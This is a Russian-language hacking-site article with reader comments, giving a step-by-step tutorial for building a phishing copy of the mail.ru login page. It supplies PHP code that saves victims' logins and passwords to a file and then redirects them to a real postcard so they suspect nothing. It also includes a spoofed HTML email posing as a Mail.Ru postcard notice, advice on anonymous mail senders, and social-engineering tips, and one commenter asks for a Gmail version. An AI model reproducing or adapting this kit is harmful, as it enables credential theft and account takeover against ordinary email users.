CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Создаём фейк сами.
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Создаём фейк сами.

07.11.2009


Фейк

Готовый Фейк это конечно здорово, но фейк сделаный собственными руками намного лучше. Хоть всемирная паутина и переполнена готовыми фейками и с помощью Гугла хуть черта лысого найдешь , но все же решил написать статейку о том, как изготовить Фейк самостоятельно , даже если вы не знакомы ни с PHP ни с HTML . И так, для примера возьмем один из распространенных почтовиков, а иммено www.mail.ru и будем делать подложную страничку АВТОРИЗАЦИИ .

1. Создадим файл index.php : 
Для этого запускаем браузер ( я буду работать в Opere). Идем по ссылке http://win.mail.ru/cgi-bin/login , перед вами загрузилась страница Авторизации . 
Далее жмем - "Вид", в ниспадающем меню выбираем строку "Исходный текст" - жмем. Перед вами открылось новое окно с человеконепонятным текстом гы-гы-гы)) Все нормально, нам это и нужно... Теперь в этом новом окне жмем "Правка", затем жмем "Выделить все" опять жмем "Правка" и "Копировать". Фух.. не надоело тыкать ? А мну надоело ((( Тогда открываем Блокнот и жмем Ctrl+V . Все, наш текст в блокноте приступим к его редактированию. Теперь нам необходимо найти следующую строку 

Код: 
<form method="post" action="auth" onSubmit="return CheckForm(this);"> 
и заменить 
на 

Код: 
<form method="post" action="654321.php" onSubmit="return CheckForm(this);"> 
(подсказка: жмем Ctrl+H , далше собразите сами) 
И стираем три строки кода в которых содержится hidden они распологаются ниже 
вот они: 

Код: 
<input type="hidden" name="page" value=""> 

<input type="hidden" name="post" value=""> 

<input type="hidden" name="login_from" value=""> 

Теперь сохраняем файл с именем index.php . 

2. Теперь создадим скрипт отвечающий за запись переменных Login, Password и Domain - 654321.php 
Открываем блокнот и создаем там файл со следующим содержанием: 

Код: 
<?PHP 

$Login = $_POST['Login'];
Логин 
$Domain = $_POST['Domain'];//Домен 
$Pass = $_POST['Password'];//Пароль 
$c = "[email protected]$Domain:$Pass"; 
$fp = fopen("654321","a+");
//открыть файл базы 
fwrite($fp,"\n $c <br> \n");//записываем все 
fclose($fp); //закрываем 
header("Location: http://cards.mail.ru/card.html?cd=00dcfed993b461be466bcca05114e17f"); 
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"
//куда пошлем пользователя после того как он ввел данные! 

?> 

а пошлем мы его на заранее подготовленную открытку....этот момент очень важен, жертва не должна ничего заподозрить. 
3. Теперь сздадим файл базы - 654321 куда будут сливатся Login, Password и Domain. Для этого открываем Блокнот и сохраняем пустую страничку с именем 654321. 

Все фейк готов полностью осталось только залить его на хостинг и присвоить PHP скриптам права 755 , а файлу базы права 777. 

Результат работы можете посмотреть сдесь:НАШ ФЕЙК 

На этом пожалуй можно было бы и закончит статью.... Но думаю, что без примера, как заставить жертву зайти на подложную страничку, статья была бы не полной. Поэтому продолжу повествование. 

И так, тут нам понадобиться вся мощь нашего серого вещества и немного Соц инженерии, а может и наоборот немного серого вещества и вся мощь Соц инженерии зы))). Первое что надо помнить, Жертва тоже человек, а значит думает так же как и Вы )))) гы-гы-гы)) ну почти как Вы)) 
а посему представте что вам приходит письмо от неизвестного человека. Вы будете смотреть ? Лично я нет... и от различных сомнительных сервисов тоже не буду. А значит писать надо от имени почтового сервиса на котором сидит жертва.. А что для этого нужно? А нужно изучить почтовый сервис ;) какие рассылки он отправляет, какие услуги представляет, не плохо бы знать и о самом юзере (жертве) это сильно упростит задачу..мона просто прислать открытку к дню рождения от имени почтового сервиса.. это не вызывает подозрений...можно прислать приглашение на сайт знакомств, для парней от имени девушки , для девушек от имени парней (такое присутствует на mail.ru) ...можно прислать, что угодно, но это должно быть интересное или от имени почтового сервиса на котором сидит жертва !!!! Вобщем тут думайте сами.. у вас есть на это голова))) Теперь о технической стороне .. для того , что бы отправить от имени почтового сервиса Вам прийдется воспользоватся анонимной отправкой почты таких сервисов полно в инете, к примеру можно воспользоватся вот этим http://never-mind.ru/sendmail/ . Письмо нужно составлять в html формате иначе вы не скроете ссылку на подложную страничку. Вобщем ближе к телу , как говорил Ги.Де. Мопасан, привожу пример письма для просмотра открытки, раз уж мы стали делать фейк на мейле. 

Код: 
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr> 
<td> 
<div id=let_body><base href="http://win.mail.ru/cgi-bin/readmsg"><table cellspacing=0 cellpadding=5><tr valign=top> 
<td><a href="http://cards.mail.ru" target="_blank"></a></td> 
<td><font color="#333333" face="Arial" size="2"> 


Здравствуйте, на Ваше имя отправлена открытка. 

Отправитель открытки: <a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a> 

Открытку Вы можете посмотреть в течение 90 дней по ссылке 

<a href="http://priz.croe.net./" target="_self"><font color=#0857A6>http://cards.mail.ru/card.html?cd=00dcfed993b461be466bcca05114e17f</font></a> 

Нажмите на неё, чтобы попасть на страницу с открыткой. 

<hr align="left" color="silver" size="1" width="100%"> 
Чтобы своевременно узнавать о ближайших праздниках, именинниках и конкурсах, 

<a href="http://content.mail.ru/pages/p_782.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"> подпишитесь на рассылку</a>. 


<a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a> - открытки на все случаи жизни!<br><br><br> 

</font></td></tr></table> 
данный код вставляем в окно СООБЩЕНИЕ, в строке ОТ КОГО пишем [email protected], в строке ТЕМА пишем ОТКРЫТКА и жмем отправить. 


Не забудте только за ранее подготовить открытку , это важный момент !!!! Именно на нее мы будем отправлять жертву в файле 654321.php У жертвы не должно возникнуть сомнений, она должна получить то, что хотела увидеть и Вы должны увидеть то, что хотели гы-гы-гы ))) 
Ну вот и ВСЕ... хотя нет, забыл сказать о уязвимости... дабы самим не попастся, запомните единственное правило : ВСЕГДА ПРИ АВТОРИЗАЦИИ СМОТРИТЕ АДРЕСНУЮ СТРОКУ!!!!!!!! Подложный сайт мона увидеть только в ней.

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Прочее
Опубликовал: .:Doker:.
Просмотров: 18286
Проголосовало через SMS: 0
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Гражданин стоило бы копирайты поставить - статья не ваша, а взята у людей из 9009
07.11.2009 / M.W.N.N.
а как файлы на сервак закинуть,которые я создал?
12.11.2009 / Drage666
докер а как сделать вот это: "Все фейк готов полностью осталось только залить его на хостинг и присвоить PHP скриптам права 755 , а файлу базы права 777." и вот это : "Не забудте только за ранее подготовить открытку , это важный момент !!!! Именно на нее мы будем отправлять жертву в файле 654321.php У жертвы не должно возникнуть сомнений, она должна получить то, что хотела увидеть и Вы должны увидеть то, что хотели гы-гы-гы )))
Ну вот и ВСЕ... хотя нет, забыл сказать о уязвимости... дабы самим не попастся, запомните единственное правило : ВСЕГДА ПРИ АВТОРИЗАЦИИ СМОТРИТЕ АДРЕСНУЮ СТРОКУ!!!!!!!! Подложный сайт мона увидеть только в ней.
" ??????
23.02.2010 / sarkis007
без коирайтов + баян = статья Докера
20.06.2010 / Bb0y
пыталась сделать фейк своими руками)) зашла по ссылке : http://win.mail.ru/cgi-bin/login переводит меня сюда:http://e.mail.ru/cgi-bin/login
 
нигде не могу найти : Далее жмем - "Вид", в ниспадающем меню выбираем строку "Исходный текст" - жмем
 
подскажите, что-то не так делаю???
 
мне нужен фейк для gmail.com
 
мерси за подсказки!
 
17.03.2013 / laura81
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...
  • Кардерский форум Joker’s Stash объявил о закрытии
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » Сервис Postman - 500 руб за получение писем и 10€ за пересыл...
  • Разное / Куплю, приму в дар » Покупка аккаунтов Uphold
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Взлом и безопасность / Новичкам » Re: Помогите взломать gmail.com
  • Разное / Предложения работы » Re: Зайти на сайт из под Администратора + публикация статьи
  • Взлом и безопасность / WEB сайтов » Брутс для 2fa биржи
  • Разное / Предложения работы » Нужен Взлом сайта на DLE

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}